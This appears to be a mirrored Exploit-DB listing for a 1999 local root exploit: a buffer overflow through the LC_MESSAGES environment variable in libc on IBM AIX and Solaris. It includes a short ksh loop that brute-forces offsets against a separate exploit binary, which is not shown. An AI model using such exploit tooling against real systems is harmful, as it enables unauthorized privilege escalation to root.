- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19213
- Проверка EDB
-
- Пройдено
- Автор
- UNYUN@SHADOWPENGUINSECURITY
- Тип уязвимости
- LOCAL
- Платформа
- AIX
- CVE
- cve-1999-0767
- Дата публикации
- 1999-05-22
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1)
Код:
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
done- Источник
- www.exploit-db.com
